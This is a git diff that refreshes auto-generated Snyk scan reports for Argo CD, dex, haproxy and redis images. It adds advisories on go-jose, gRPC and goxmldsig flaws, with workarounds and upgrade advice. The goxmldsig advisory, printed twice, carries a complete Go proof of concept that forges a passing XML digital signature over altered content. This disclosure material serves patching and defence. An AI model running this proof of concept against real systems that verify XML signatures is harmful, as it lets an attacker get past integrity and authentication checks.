+        <li><a href="https://github.com/go-jose/go-jose/commit/0dd4dd541c665fb292d664f77604ba694726f298">GitHub Commit</a></li>
+        <li><a href="https://github.com/go-jose/go-jose/commit/add6a284ea0f844fd6628cba637be5451fe4b28a">GitHub Commit</a></li>
+        <li><a href="https://github.com/go-jose/go-jose/commit/f4c051a0653d78199a053892f7619ebf96339502">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV3-6419233">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">Allocation of Resources Without Limits or Throttling</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: /argo-cd/argoproj/argo-cd/v3 <span class="list-paths__item__arrow">›</span> go.mod
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/go-jose/go-jose/v3
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+        
+                                    github.com/argoproj/argo-cd/v3@0.0.0, github.com/oauth2-proxy/mockoidc@#caebfff84d25 and others
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/argoproj/argo-cd/v3@0.0.0
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/oauth2-proxy/mockoidc@#caebfff84d25
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/go-jose/go-jose/v3@3.0.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the use of <code>strings.Split</code> to split JWT tokens. An attacker can cause memory exhaustion and service disruption by sending numerous malformed tokens with a large number of <code>.</code> characters. </p>
+        <h2 id="workaround">Workaround</h2>
+        <p>This vulnerability can be mitigated by pre-validating that payloads passed to Go JOSE do not contain an excessive number of <code>.</code> characters.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>github.com/go-jose/go-jose/v3</code> to version 3.0.4 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/go-jose/go-jose/commit/99b346cec4e86d102284642c5dcbe9bb0cacfc22">GitHub Commit</a></li>
+        <li><a href="https://github.com/go-jose/go-jose/releases/tag/v4.0.5">GitHub Release</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOJOSEGOJOSEV3-8754524">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">Improper Validation of Integrity Check Value</h2>
--- a/docs/snyk/master/ghcr.io_dexidp_dex_v2.45.0.html
+++ b/docs/snyk/master/ghcr.io_dexidp_dex_v2.45.0.html
@@ -7,7 +7,7 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Snyk test report</title>
-  <meta name="description" content="27 known vulnerabilities found in 46 vulnerable dependency paths.">
+  <meta name="description" content="29 known vulnerabilities found in 49 vulnerable dependency paths.">
  <base target="_blank">
  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
    sizes="194x194">
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:28:16 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:30:17 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following paths:</span>
@@ -505,8 +505,8 @@
              </div>
    
              <div class="meta-counts">
-                <div class="meta-count"><span>27</span> <span>known vulnerabilities</span></div>
-                <div class="meta-count"><span>46 vulnerable dependency paths</span></div>
+                <div class="meta-count"><span>29</span> <span>known vulnerabilities</span></div>
+                <div class="meta-count"><span>49 vulnerable dependency paths</span></div>
                <div class="meta-count"><span>1189</span> <span>dependencies</span></div>
              </div><!-- .meta-counts -->
            </div><!-- .layout-container--short -->
@@ -516,7 +516,7 @@
    <div class="layout-container" style="padding-top: 35px;">
      <div class="cards--vuln filter--patch filter--ignore">
        <div class="card card--vuln  disclosure--not-new severity--critical" data-snyk-test="critical">
-            <h2 class="card__title">Out-of-bounds Write</h2>
+            <h2 class="card__title">Incorrect Authorization</h2>
            <div class="card__section">
        
                <div class="card__labels">
@@ -530,6 +530,89 @@
        
                <hr/>
        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            google.golang.org/grpc
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/hairyhenderson/gomplate/v5@* and google.golang.org/grpc@v1.77.0
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/hairyhenderson/gomplate/v5@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.77.0
+                                        
+                                </span>
+        
+                            </li>
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/dexidp/dex@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.79.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
+        <h2 id="workaround">Workaround</h2>
+        <p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
+            <h2 class="card__title">Out-of-bounds Write</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--high">
+                        <span class="label__text">high severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
                <ul class="card__meta">
                    <li class="card__meta__item">
                        Package Manager: alpine:3.23
@@ -686,6 +769,193 @@
                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
+            <h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--high">
+                        <span class="label__text">high severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Proof of Concept</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: ghcr.io/dexidp/dex:v2.45.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/russellhaering/goxmldsig
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/dexidp/dex@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/russellhaering/goxmldsig@v1.5.0
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
+        <p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
+        <h2 id="poc">PoC</h2>
+        <pre><code>package main
+        
+        import (
+            &quot;crypto/rand&quot;
+            &quot;crypto/rsa&quot;
+            &quot;crypto/tls&quot;
+            &quot;crypto/x509&quot;
+            &quot;encoding/base64&quot;
+            &quot;fmt&quot;
+            &quot;math/big&quot;
+            &quot;time&quot;
+        
+            &quot;github.com/beevik/etree&quot;
+            dsig &quot;github.com/russellhaering/goxmldsig&quot;
+        )
+        
+        func main() {
+            key, err := rsa.GenerateKey(rand.Reader, 2048)
+            if err != nil {
+                panic(err)
+            }
+        
+            template := &amp;x509.Certificate{
+                SerialNumber: big.NewInt(1),
+                NotBefore:    time.Now().Add(-1 * time.Hour),
+                NotAfter:     time.Now().Add(1 * time.Hour),
+            }
+        
+            certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
+            if err != nil {
+                panic(err)
+            }
+        
+            cert, _ := x509.ParseCertificate(certDER)
+        
+            doc := etree.NewDocument()
+            root := doc.CreateElement(&quot;Root&quot;)
+            root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
+            root.SetText(&quot;Malicious Content&quot;)
+        
+            tlsCert := tls.Certificate{
+                Certificate: [][]byte{cert.Raw},
+                PrivateKey:  key,
+            }
+        
+            ks := dsig.TLSCertKeyStore(tlsCert)
+            signingCtx := dsig.NewDefaultSigningContext(ks)
+        
+            sig, err := signingCtx.ConstructSignature(root, true)
+            if err != nil {
+                panic(err)
+            }
+        
+            signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
+        
+            existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
+            existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
+        
+            originalEl := etree.NewElement(&quot;Root&quot;)
+            originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
+            originalEl.SetText(&quot;Original Content&quot;)
+        
+            sig1, _ := signingCtx.ConstructSignature(originalEl, true)
+            ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
+        
+            signedInfo.InsertChildAt(existingRef.Index(), ref1)
+        
+            c14n := signingCtx.Canonicalizer
+        
+            detachedSI := signedInfo.Copy()
+            if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
+                detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
+            }
+        
+            canonicalBytes, err := c14n.Canonicalize(detachedSI)
+            if err != nil {
+                fmt.Println(&quot;c14n error:&quot;, err)
+                return
+            }
+        
+            hash := signingCtx.Hash.New()
+            hash.Write(canonicalBytes)
+            digest := hash.Sum(nil)
+        
+            rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
+            if err != nil {
+                panic(err)
+            }
+        
+            sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
+            sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
+        
+            certStore := &amp;dsig.MemoryX509CertificateStore{
+                Roots: []*x509.Certificate{cert},
+            }
+            valCtx := dsig.NewDefaultValidationContext(certStore)
+        
+            root.AddChild(sig)
+        
+            doc.SetRoot(root)
+            str, _ := doc.WriteToString()
+            fmt.Println(&quot;XML:&quot;)
+            fmt.Println(str)
+        
+            validated, err := valCtx.Validate(root)
+            if err != nil {
+                fmt.Println(&quot;validation failed:&quot;, err)
+            } else {
+                fmt.Println(&quot;validation ok&quot;)
+                fmt.Println(&quot;validated text:&quot;, validated.Text())
+            }
+        }
+        </code></pre>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">Improper Validation of Specified Quantity in Input</h2>
--- a/docs/snyk/master/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
+++ b/docs/snyk/master/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:28:23 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:30:24 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following path:</span>
--- a/docs/snyk/master/public.ecr.aws_docker_library_redis_8.2.3-alpine.html
+++ b/docs/snyk/master/public.ecr.aws_docker_library_redis_8.2.3-alpine.html
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:28:29 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:30:32 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following path:</span>
--- a/docs/snyk/master/quay.io_argoproj_argocd_latest.html
+++ b/docs/snyk/master/quay.io_argoproj_argocd_latest.html
--- a/docs/snyk/v3.1.12/argocd-iac-install.html
+++ b/docs/snyk/v3.1.12/argocd-iac-install.html
@@ -456,7 +456,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:38:20 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:42:49 am (UTC+00:00)</p>
              </div>
                <div class="source-panel">
                  <span>Scanned the following path:</span>
--- a/docs/snyk/v3.1.12/argocd-iac-namespace-install.html
+++ b/docs/snyk/v3.1.12/argocd-iac-namespace-install.html
@@ -456,7 +456,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:38:29 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:42:58 am (UTC+00:00)</p>
              </div>
                <div class="source-panel">
                  <span>Scanned the following path:</span>
--- a/docs/snyk/v3.1.12/argocd-test.html
+++ b/docs/snyk/v3.1.12/argocd-test.html
--- a/docs/snyk/v3.1.12/ghcr.io_dexidp_dex_v2.43.0.html
+++ b/docs/snyk/v3.1.12/ghcr.io_dexidp_dex_v2.43.0.html
@@ -7,7 +7,7 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Snyk test report</title>
-  <meta name="description" content="46 known vulnerabilities found in 141 vulnerable dependency paths.">
+  <meta name="description" content="48 known vulnerabilities found in 144 vulnerable dependency paths.">
  <base target="_blank">
  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
    sizes="194x194">
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:36:29 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:41:02 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following paths:</span>
@@ -505,8 +505,8 @@
              </div>
    
              <div class="meta-counts">
-                <div class="meta-count"><span>46</span> <span>known vulnerabilities</span></div>
-                <div class="meta-count"><span>141 vulnerable dependency paths</span></div>
+                <div class="meta-count"><span>48</span> <span>known vulnerabilities</span></div>
+                <div class="meta-count"><span>144 vulnerable dependency paths</span></div>
                <div class="meta-count"><span>1131</span> <span>dependencies</span></div>
              </div><!-- .meta-counts -->
            </div><!-- .layout-container--short -->
@@ -515,6 +515,89 @@

    <div class="layout-container" style="padding-top: 35px;">
      <div class="cards--vuln filter--patch filter--ignore">
+        <div class="card card--vuln  disclosure--not-new severity--critical" data-snyk-test="critical">
+            <h2 class="card__title">Incorrect Authorization</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--critical">
+                        <span class="label__text">critical severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            google.golang.org/grpc
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/hairyhenderson/gomplate/v4@* and google.golang.org/grpc@v1.68.1
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/hairyhenderson/gomplate/v4@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.68.1
+                                        
+                                </span>
+        
+                            </li>
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/dexidp/dex@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.72.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
+        <h2 id="workaround">Workaround</h2>
+        <p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">CVE-2025-69421</h2>
            <div class="card__section">
@@ -1055,6 +1138,193 @@
                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
+            <h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--high">
+                        <span class="label__text">high severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Proof of Concept</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: ghcr.io/dexidp/dex:v2.43.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/russellhaering/goxmldsig
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/dexidp/dex@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/russellhaering/goxmldsig@v1.5.0
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
+        <p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
+        <h2 id="poc">PoC</h2>
+        <pre><code>package main
+        
+        import (
+            &quot;crypto/rand&quot;
+            &quot;crypto/rsa&quot;
+            &quot;crypto/tls&quot;
+            &quot;crypto/x509&quot;
+            &quot;encoding/base64&quot;
+            &quot;fmt&quot;
+            &quot;math/big&quot;
+            &quot;time&quot;
+        
+            &quot;github.com/beevik/etree&quot;
+            dsig &quot;github.com/russellhaering/goxmldsig&quot;
+        )
+        
+        func main() {
+            key, err := rsa.GenerateKey(rand.Reader, 2048)
+            if err != nil {
+                panic(err)
+            }
+        
+            template := &amp;x509.Certificate{
+                SerialNumber: big.NewInt(1),
+                NotBefore:    time.Now().Add(-1 * time.Hour),
+                NotAfter:     time.Now().Add(1 * time.Hour),
+            }
+        
+            certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
+            if err != nil {
+                panic(err)
+            }
+        
+            cert, _ := x509.ParseCertificate(certDER)
+        
+            doc := etree.NewDocument()
+            root := doc.CreateElement(&quot;Root&quot;)
+            root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
+            root.SetText(&quot;Malicious Content&quot;)
+        
+            tlsCert := tls.Certificate{
+                Certificate: [][]byte{cert.Raw},
+                PrivateKey:  key,
+            }
+        
+            ks := dsig.TLSCertKeyStore(tlsCert)
+            signingCtx := dsig.NewDefaultSigningContext(ks)
+        
+            sig, err := signingCtx.ConstructSignature(root, true)
+            if err != nil {
+                panic(err)
+            }
+        
+            signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
+        
+            existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
+            existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
+        
+            originalEl := etree.NewElement(&quot;Root&quot;)
+            originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
+            originalEl.SetText(&quot;Original Content&quot;)
+        
+            sig1, _ := signingCtx.ConstructSignature(originalEl, true)
+            ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
+        
+            signedInfo.InsertChildAt(existingRef.Index(), ref1)
+        
+            c14n := signingCtx.Canonicalizer
+        
+            detachedSI := signedInfo.Copy()
+            if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
+                detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
+            }
+        
+            canonicalBytes, err := c14n.Canonicalize(detachedSI)
+            if err != nil {
+                fmt.Println(&quot;c14n error:&quot;, err)
+                return
+            }
+        
+            hash := signingCtx.Hash.New()
+            hash.Write(canonicalBytes)
+            digest := hash.Sum(nil)
+        
+            rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
+            if err != nil {
+                panic(err)
+            }
+        
+            sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
+            sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
+        
+            certStore := &amp;dsig.MemoryX509CertificateStore{
+                Roots: []*x509.Certificate{cert},
+            }
+            valCtx := dsig.NewDefaultValidationContext(certStore)
+        
+            root.AddChild(sig)
+        
+            doc.SetRoot(root)
+            str, _ := doc.WriteToString()
+            fmt.Println(&quot;XML:&quot;)
+            fmt.Println(str)
+        
+            validated, err := valCtx.Validate(root)
+            if err != nil {
+                fmt.Println(&quot;validation failed:&quot;, err)
+            } else {
+                fmt.Println(&quot;validation ok&quot;)
+                fmt.Println(&quot;validated text:&quot;, validated.Text())
+            }
+        }
+        </code></pre>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">Asymmetric Resource Consumption (Amplification)</h2>
--- a/docs/snyk/v3.1.12/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
+++ b/docs/snyk/v3.1.12/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:36:33 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:41:06 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following path:</span>
--- a/docs/snyk/v3.1.12/public.ecr.aws_docker_library_redis_7.2.11-alpine.html
+++ b/docs/snyk/v3.1.12/public.ecr.aws_docker_library_redis_7.2.11-alpine.html
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:36:40 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:41:14 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following paths:</span>
--- a/docs/snyk/v3.1.12/quay.io_argoproj_argocd_v3.1.12.html
+++ b/docs/snyk/v3.1.12/quay.io_argoproj_argocd_v3.1.12.html
@@ -7,7 +7,7 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Snyk test report</title>
-  <meta name="description" content="55 known vulnerabilities found in 199 vulnerable dependency paths.">
+  <meta name="description" content="62 known vulnerabilities found in 206 vulnerable dependency paths.">
  <base target="_blank">
  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
    sizes="194x194">
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:37:01 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:41:34 am (UTC+00:00)</p>
              </div>
